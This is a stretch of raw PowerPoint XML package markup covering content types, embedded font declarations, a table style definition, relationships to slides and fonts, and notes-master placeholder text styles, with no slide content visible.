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45.xml"/>
  <Override ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml" PartName="/ppt/notesSlides/notesSlide3.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43.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47.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embedTrueTypeFonts="1" strictFirstAndLastChars="0" saveSubsetFonts="1">
  <p:sldMasterIdLst>
    <p:sldMasterId id="2147483661"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Lst>
  <p:sldSz cy="6858000" cx="12192000"/>
  <p:notesSz cx="6669075" cy="9928225"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Cabin"/>
      <p:regular r:id="rId53"/>
      <p:bold r:id="rId54"/>
      <p:italic r:id="rId55"/>
      <p:boldItalic r:id="rId56"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Tahoma"/>
      <p:regular r:id="rId57"/>
      <p:bold r:id="rId5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F200D64E-4686-456C-BBD7-8986DA33EC83}">
  <a:tblStyle styleId="{F200D64E-4686-456C-BBD7-8986DA33EC83}" styleName="Table_0"/>
  <a:tblStyle styleId="{A2717AC8-1ECA-4A94-8ABF-F172AB3327F9}" styleName="Table_1">
    <a:wholeTbl>
      <a:tcTxStyle b="off" i="off">
        <a:font>
          <a:latin typeface="Trebuchet MS"/>
          <a:ea typeface="Trebuchet MS"/>
          <a:cs typeface="Trebuchet MS"/>
        </a:font>
        <a:schemeClr val="dk1"/>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr>
          <a:left>
            <a:ln cap="flat" cmpd="sng" w="12700">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd len="med" w="med" type="none"/>
              <a:tailEnd len="med" w="med" type="none"/>
            </a:ln>
          </a:left>
          <a:right>
            <a:ln cap="flat" cmpd="sng" w="12700">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd len="med" w="med" type="none"/>
              <a:tailEnd len="med" w="med" type="none"/>
            </a:ln>
          </a:right>
          <a:top>
            <a:ln cap="flat" cmpd="sng" w="12700">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd len="med" w="med" type="none"/>
              <a:tailEnd len="med" w="med" type="none"/>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln cap="flat" cmpd="sng" w="12700">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd len="med" w="med" type="none"/>
              <a:tailEnd len="med" w="med" type="none"/>
            </a:ln>
          </a:bottom>
          <a:insideH>
            <a:ln cap="flat" cmpd="sng" w="12700">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd len="med" w="med" type="none"/>
              <a:tailEnd len="med" w="med" type="none"/>
            </a:ln>
          </a:insideH>
          <a:insideV>
            <a:ln cap="flat" cmpd="sng" w="12700">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd len="med" w="med" type="none"/>
              <a:tailEnd len="med" w="med" type="none"/>
            </a:ln>
          </a:insideV>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:srgbClr val="E8ECF4"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:wholeTbl>
    <a:band1H>
      <a:tcStyle>
        <a:fill>
          <a:solidFill>
            <a:srgbClr val="CFD7E7"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:band1H>
    <a:band1V>
      <a:tcStyle>
        <a:fill>
          <a:solidFill>
            <a:srgbClr val="CFD7E7"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:band1V>
    <a:lastCol>
      <a:tcTxStyle b="on" i="off">
        <a:font>
          <a:latin typeface="Trebuchet MS"/>
          <a:ea typeface="Trebuchet MS"/>
          <a:cs typeface="Trebuchet MS"/>
        </a:font>
        <a:schemeClr val="lt1"/>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:lastCol>
    <a:firstCol>
      <a:tcTxStyle b="on" i="off">
        <a:font>
          <a:latin typeface="Trebuchet MS"/>
          <a:ea typeface="Trebuchet MS"/>
          <a:cs typeface="Trebuchet MS"/>
        </a:font>
        <a:schemeClr val="lt1"/>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:firstCol>
    <a:lastRow>
      <a:tcTxStyle b="on" i="off">
        <a:font>
          <a:latin typeface="Trebuchet MS"/>
          <a:ea typeface="Trebuchet MS"/>
          <a:cs typeface="Trebuchet MS"/>
        </a:font>
        <a:schemeClr val="lt1"/>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr>
          <a:top>
            <a:ln cap="flat" cmpd="sng" w="38100">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd len="med" w="med" type="none"/>
              <a:tailEnd len="med" w="med" type="none"/>
            </a:ln>
          </a:top>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:lastRow>
    <a:firstRow>
      <a:tcTxStyle b="on" i="off">
        <a:font>
          <a:latin typeface="Trebuchet MS"/>
          <a:ea typeface="Trebuchet MS"/>
          <a:cs typeface="Trebuchet MS"/>
        </a:font>
        <a:schemeClr val="lt1"/>
      </a:tcTxStyle>
      <a:tcStyle>
        <a:tcBdr>
          <a:bottom>
            <a:ln cap="flat" cmpd="sng" w="38100">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd len="med" w="med" type="none"/>
              <a:tailEnd len="med" w="med" type="none"/>
            </a:ln>
          </a:bottom>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:firstRow>
  </a:tblStyle>
</a:tblStyleLst>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font" Target="fonts/Cabin-regular.fntdata"/><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font" Target="fonts/Cabin-italic.fntdata"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Cabin-bold.fntdata"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Tahoma-regular.fntdata"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Cabin-boldItalic.fntdata"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide10.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide9.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Tahoma-bold.fntdata"/><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2" name="Shape 2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Shape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="hdr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="2890838" cy="496887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-12689" lvl="1" marL="457189" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-12677" lvl="2" marL="914377" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-12665" lvl="3" marL="1371566" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-12654" lvl="4" marL="1828754" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-12643" lvl="5" marL="2285943" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-12631" lvl="6" marL="2743131" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-12619" lvl="7" marL="3200320" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-12608" lvl="8" marL="3657509" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="10" type="dt"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="0"/>
            <a:ext cx="2890836" cy="496887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-12689" lvl="1" marL="457189" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-12677" lvl="2" marL="914377" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-12665" lvl="3" marL="1371566" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-12654" lvl="4" marL="1828754" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-12643" lvl="5" marL="2285943" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-12631" lvl="6" marL="2743131" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-12619" lvl="7" marL="3200320" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-12608" lvl="8" marL="3657509" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="3"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6" name="Shape 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335587" cy="4467224"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-12689" lvl="1" marL="457189" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-12677" lvl="2" marL="914377" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-12665" lvl="3" marL="1371566" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-12654" lvl="4" marL="1828754" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-12643" lvl="5" marL="2285943" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-12631" lvl="6" marL="2743131" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-12619" lvl="7" marL="3200320" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-12608" lvl="8" marL="3657509" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="11" type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="9429750"/>
            <a:ext cx="2890838" cy="496887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-12689" lvl="1" marL="457189" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-12677" lvl="2" marL="914377" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-12665" lvl="3" marL="1371566" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-12654" lvl="4" marL="1828754" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-12643" lvl="5" marL="2285943" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-12631" lvl="6" marL="2743131" marR="0" rtl="0" algn="l">
              <a:spcBef>
